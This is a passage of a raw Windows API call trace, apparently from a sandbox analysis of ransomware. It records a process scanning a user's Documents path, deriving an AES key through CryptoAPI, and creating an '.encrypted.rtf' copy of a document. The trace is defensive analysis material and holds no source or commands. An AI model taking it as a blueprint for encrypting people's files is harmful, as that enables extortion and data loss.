dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.543] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HDwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hrw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rw\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yMffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ffX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fX90.rtf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.545] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.545] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.545] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.545] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0034.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.546] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.546] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.546] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.546] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.546] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.546] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed46980, ftCreationTime.dwHighDateTime=0x1d5c51a, ftLastAccessTime.dwLowDateTime=0xcdb1bcd0, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0xcdb1bcd0, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x9fdd, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="6yMffX90.rtf", cAlternateFileName="")) returned 0x7c2240 [0034.546] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.547] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.547] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.547] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.547] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0034.547] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.547] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.548] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.549] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.549] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.549] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.549] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.549] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.549] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.549] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.550] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0034.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0034.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.550] CryptHashData (hHash=0x7c2100, pbData=0x7c97c8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0034.550] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0034.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.550] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0034.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.550] CryptDestroyHash (hHash=0x7c2100) returned 1 [0034.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\6ymffx90.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.551] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.551] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\6yMffX90.encrypted.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\6ymffx90.encrypted.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.551] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 